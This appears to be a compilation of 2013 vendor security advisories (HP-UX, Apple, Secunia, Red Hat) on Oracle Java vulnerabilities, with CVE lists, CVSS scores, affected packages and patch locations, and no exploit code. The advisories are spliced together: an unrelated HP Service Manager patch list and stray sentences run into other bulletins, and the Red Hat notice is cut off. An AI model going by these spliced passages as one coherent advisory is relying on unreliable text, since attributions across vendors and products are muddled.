http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03725347
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03725347
Version: 1
HPSBUX02864 SSRT101156 rev.1 - HP-UX Running Java, Remote Unauthorized
Access, Disclosure of Information, and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
References: CVE-2012-1541, CVE-2012-3213, CVE-2012-3342, CVE-2013-0351,
CVE-2013-0409, CVE-2013-0419, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425,
CVE-2013-0426, CVE-2013-0427, CVE-2013-0428, CVE-2013-0429, CVE-2013-0432,
CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0438, CVE-2013-0440,
CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0445, CVE-2013-0446,
CVE-2013-0450, CVE-2013-0809, CVE-2013-1473, CVE-2013-1475, CVE-2013-1476,
CVE-2013-1478, CVE-2013-1480, CVE-2013-1481, CVE-2013-1493
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE v6.0.17 and
earlier
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2012-1541 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3213 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3342 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0351 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2013-0409 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0419 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0423 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0424 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0425 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0426 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0427 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0428 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0429 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2013-0433 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0434 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0435 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0438 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2013-0440 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2013-0441 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0442 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0443 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0
CVE-2013-0445 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0446 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0450 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1473 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-1475 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1476 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1478 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1480 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1481 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1493 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these
vulnerabilities.
The upgrade is available from the following location
http://www.hp.com/java
OS Version
Release Version
HP-UX B.11.11, B.11.23, B.11.31
JDK and JRE v6.0.18 or subsequent
MANUAL ACTIONS: Yes - Update
For Java v6.0 update to Java v6.0.18 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
HP-UX B.11.23
===========
Jdk60.JDK60-COM
Jdk60.JDK60-PA20
Jdk60.JDK60-PA20W
Jre60.JRE60-COM
Jre60.JRE60-COM-DOC
Jre60.JRE60-PA20
Jre60.JRE60-PA20-HS
Jre60.JRE60-PA20W
Jre60.JRE60-PA20W-HS
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.18.00 or subsequent
HP-UX B.11.23
HP-UX B.11.31
===========
Jdk60.JDK60-COM
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.18.00 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 3 April 2013 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners
| VAR-201302-0134 | CVE-2013-0351 | Oracle Java contains multiple vulnerabilities |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than other CVEs listed in the February 2013 CPU. Java 7 Update 11, Java 6 Update 38, and earlier versions of Java contain vulnerabilities that can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.
The vulnerability can be exploited over multiple protocols. This issue affects the 'Deployment' sub-component.
This vulnerability affects the following supported versions:
7 Update 11 and prior, 6 Update 38 and prior
Note: This issue was previously discussed in BID 57670 (Oracle Java Runtime Environment Multiple Security Vulnerabilities) but has been given its own record to better document it. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2013-02-19-1 Java for OS X 2013-001 and Mac OS X v10.6
Update 13
Java for OS X 2013-001 and Mac OS X v10.6 Update 13 is now available
and addresses the following:
Java
Available for: OS X Lion v10.7 or later,
OS X Lion Server v10.7 or later, OS X Mountain Lion 10.8 or later
Impact: Multiple vulnerabilities in Java 1.6.0_37
Description: Multiple vulnerabilities existed in Java 1.6.0_37, the
most serious of which may allow an untrusted Java applet to execute
arbitrary code outside the Java sandbox. Visiting a web page
containing a maliciously crafted untrusted Java applet may lead to
arbitrary code execution with the privileges of the current user. For
Mac OS X v10.6 systems, these issues were addressed in Java for Mac
OS X v10.6 Update 13. Further information is available via the Java
website at http://www.oracle.com/technetwork/java/javase/
releasenotes-136954.html
CVE-ID
CVE-2012-3213
CVE-2012-3342
CVE-2013-0351
CVE-2013-0409
CVE-2013-0419
CVE-2013-0423
CVE-2013-0424
CVE-2013-0425
CVE-2013-0426
CVE-2013-0427
CVE-2013-0428
CVE-2013-0429
CVE-2013-0432
CVE-2013-0433
CVE-2013-0434
CVE-2013-0435
CVE-2013-0438
CVE-2013-0440
CVE-2013-0441
CVE-2013-0442
CVE-2013-0443
CVE-2013-0445
CVE-2013-0446
CVE-2013-0450
CVE-2013-1473
CVE-2013-1475
CVE-2013-1476
CVE-2013-1478
CVE-2013-1480
CVE-2013-1481
Java
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 or later, OS X Lion Server v10.7 or later,
OS X Mountain Lion 10.8 or later
Impact: Multiple vulnerabilities in Java
Description: Multiple vulnerabilities existed in Java, the most
serious of which may allow an untrusted Java applet to execute
arbitrary code outside the Java sandbox. Visiting a web page
containing a maliciously crafted untrusted Java applet may lead to
arbitrary code execution with the privileges of the current user.
Further information is available via the Java website at http://www.o
racle.com/technetwork/java/javase/releasenotes-136954.html
CVE-ID
CVE-2013-1486
CVE-2013-1487
CVE-2013-1488
Malware removal
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 or later, OS X Lion Server v10.7 or later,
OS X Mountain Lion 10.8 or later
Description: This update runs a malware removal tool that will
remove the most common variants of malware. If malware is found, it
presents a dialog notifying the user that malware was removed. There
is no indication to the user if malware is not found.
Java for OS X 2013-001 and Java for Mac OS X 10.6 Update 13
may be obtained from the Software Update pane in System Preferences,
Mac App Store, or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
For Mac OS X v10.6 systems
The download file is named: JavaForMacOSX10.6.Update13.dmg
Its SHA-1 digest is: 5327984bc0b300c237fe69cecf69513624f56b0e
For OS X Lion and Mountain Lion systems
The download file is named: JavaForOSX2013-001.dmg
Its SHA-1 digest is: 145d74354241cf2f567d2768bbd0a7185e7d308a
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJRI/A/AAoJEPefwLHPlZEwDp4QAKz9nfo397KaudpFDey26bsb
GNR8HQ3Z5Ln0ArgwBcc2XabzIYXsjmY7nPdZgq1m0sWgFGWtfQ7qslRooUyNLOsB
WUddu+hQYvPn3CJOZsaPfTA2mfK6Qk9LeyqzUUkZrRNltHnIFMO7uXLEIdrFdnnx
exFMPjbIq+xM5UZgvd/2grtF4DaZHnbcK+t/tDwH09/hGRQ+l+3a/3FB2S1Av85c
FSuiieyrz2NNnDwFCj5NeSFQuK7hr52TiSOEPYI2eiTepyBHrUy03wAe8uwIzQII
RjkY3Nbc8AZt0Q6lq5TgsQbH+vrwVE07nty36uMKmE2vJXyOAIZjfrrwv9SetLwd
QnU5NYMbeHAHmSN5JQfuvDxEfL15/7Jafw2noJGotdrMzs6XQACFIHKqLORdwNkp
sltj3LwykpcyoCR8Dq7NPafqhp2wySaHX8DFSohcq1aa1w+SLDgPCZUAzknwokCL
f/hVQzP6hD0uHP/2jsLjh5g6TgHmCRdR+CKCs7QZaYAUketelRX9YOcgcXzqf5sy
EcbDvJ+rd3KsQ9gIByGwVhHD87NSZDJAyG0ROjMMS9w/7l7nhGxedzGzlyK3oNl/
VpewgZ8FpUrvY80HOPz5XyFmX+HQoSnJ8er6OI5AvHBPn+Z1yHDLS5zpLeDD/wO9
rmbzMJjZUnlCDXoLEVQ9
=qlVo
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Apple Mac OS X update for Java
SECUNIA ADVISORY ID:
SA52066
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/52066/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=52066
RELEASE DATE:
2013-02-02
DISCUSS ADVISORY:
http://secunia.com/advisories/52066/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/52066/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52066
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Apple has issued an update for Java for Mac OS X. This fixes multiple
vulnerabilities, which can be exploited by malicious people to
disclose certain sensitive information, manipulate certain data,
cause a DoS (Denial of Service), and compromise a vulnerable system.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
ORIGINAL ADVISORY:
APPLE-SA-2013-02-01-1:
http://prod.lists.apple.com/archives/security-announce/2013/Feb/msg00000.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
Download and install the updates from The HP Software Support Online (SSO).
SM 9.31P2 Server Windows Server 9.31.2004 p2
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00423
HP Itanium Server 9.31.2004 p2
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00420
Linux Server 9.31.2004 p2
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00421
Solaris Server 9.31.2004 p2
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00422
AIX Server 9.31.2004 p2
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00419
SM 9.31P2 Web Tier
Web Tier 9.31.2004 p2
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00424
SM 9.31P2 Windows Client
Windows Client 9.31.2004 p2
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00425
SM 9.31P2 Knowledge Management
SM 9.31P2 Knowledge Management
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00426
HP Service Manager v7.11
Patch URL
AIX Server 7.11.655 p21
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00482
HP Itanium Server 7.11.655 p21
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00483
HP parisc Server 7.11.655 p21
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00484
Linux x86 Server 7.11.655 p21
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00485
Solaris Server 7.11.655 p21
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00486
Windows Server 7.11.655 p21
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00487
Web Tier 7.11.655 p21
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00488
Windows Client 7.11.655 p21
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00489
HISTORY
Version:1 (rev.1) - 29 April 2013 Initial release
Version:2 (rev.2) - 30 October 2013 added HP Service Manager v7.11
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy. In a typical operating environment, these are of low security risk as
the runtime is not used on untrusted applets. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03725347
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03725347
Version: 1
HPSBUX02864 SSRT101156 rev.1 - HP-UX Running Java, Remote Unauthorized
Access, Disclosure of Information, and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2013-04-03
Last Updated: 2013-04-03
Potential Security Impact: Remote unauthorized access, disclosure of
information, and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in Java Runtime
Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These
vulnerabilities could allow remote unauthorized access, disclosure of
information, and other exploits.
References: CVE-2012-1541, CVE-2012-3213, CVE-2012-3342, CVE-2013-0351,
CVE-2013-0409, CVE-2013-0419, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425,
CVE-2013-0426, CVE-2013-0427, CVE-2013-0428, CVE-2013-0429, CVE-2013-0432,
CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0438, CVE-2013-0440,
CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0445, CVE-2013-0446,
CVE-2013-0450, CVE-2013-0809, CVE-2013-1473, CVE-2013-1475, CVE-2013-1476,
CVE-2013-1478, CVE-2013-1480, CVE-2013-1481, CVE-2013-1493
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE v6.0.17 and
earlier
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2012-1541 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3213 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3342 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0351 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2013-0409 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0419 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0423 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0424 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0425 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0426 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0427 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0428 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0429 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2013-0433 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0434 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0435 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0438 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2013-0440 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2013-0441 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0442 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0443 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0
CVE-2013-0445 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0446 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0450 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1473 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-1475 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1476 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1478 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1480 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1481 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1493 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these
vulnerabilities.
The upgrade is available from the following location
http://www.hp.com/java
OS Version
Release Version
HP-UX B.11.11, B.11.23, B.11.31
JDK and JRE v6.0.18 or subsequent
MANUAL ACTIONS: Yes - Update
For Java v6.0 update to Java v6.0.18 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
HP-UX B.11.23
===========
Jdk60.JDK60-COM
Jdk60.JDK60-PA20
Jdk60.JDK60-PA20W
Jre60.JRE60-COM
Jre60.JRE60-COM-DOC
Jre60.JRE60-PA20
Jre60.JRE60-PA20-HS
Jre60.JRE60-PA20W
Jre60.JRE60-PA20W-HS
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.18.00 or subsequent
HP-UX B.11.23
HP-UX B.11.31
===========
Jdk60.JDK60-COM
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.18.00 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 3 April 2013 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: java-1.7.0-oracle security update
Advisory ID: RHSA-2013:0237-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0237.html
Issue date: 2013-02-04
CVE Names: CVE-2012-1541 CVE-2012-3213 CVE-2012-3342
CVE-2013-0351 CVE-2013-0409 CVE-2013-0419
CVE-2013-0423 CVE-2013-0424 CVE-2013-0425
CVE-2013-0426 CVE-2013-0427 CVE-2013-0428
CVE-2013-0429 CVE-2013-0430 CVE-2013-0431
CVE-2013-0432 CVE-2013-0433 CVE-2013-0434
CVE-2013-0435 CVE-2013-0437 CVE-2013-0438
CVE-2013-0440 CVE-2013-0441 CVE-2013-0442
CVE-2013-0443 CVE-2013-0444 CVE-2013-0445
CVE-2013-0446 CVE-2013-0448 CVE-2013-0449
CVE-2013-0450 CVE-2013-1473 CVE-2013-1475
CVE-2013-1476 CVE-2013-1478 CVE-2013-1479
CVE-2013-1480 CVE-2013-1489
=====================================================================
1. Summary:
Updated java-1.7.0-oracle packages that fix several security issues are now
available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Further
information about these flaws can be found on the Oracle Java SE Critical
Patch Update Advisory page, listed in the References section.
(CVE-2012-1541, CVE-2012-3213, CVE-2012-3342, CVE-2013-0351, CVE-2013-0409,
CVE-2013-0419, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425, CVE-2013-0426,
CVE-2013-0427, CVE-2013-0428, CVE-2013-0429, CVE-2013-0430, CVE-2013-0431,
CVE-2013-0432, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0437,
CVE-2013-0438, CVE-2013-0440, CVE-2013-0441, CVE-2013-0442, CVE-2013-0443,
CVE-2013-0444, CVE-2013-0445, CVE-2013-0446, CVE-2013-0448, CVE-2013-0449,
CVE-2013-0450, CVE-2013-1473, CVE-2013-1475, CVE-2013-1476, CVE-2013-1478,
CVE-2013-1479, CVE-2013-1480, CVE-2013-1489)
All users of java-1.7.0-oracle are advised to upgrade to these updated
packages, which provide Oracle Java 7 Update 13 and resolve these issues.
All running instances of Oracle Java must be restarted for the update to
take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
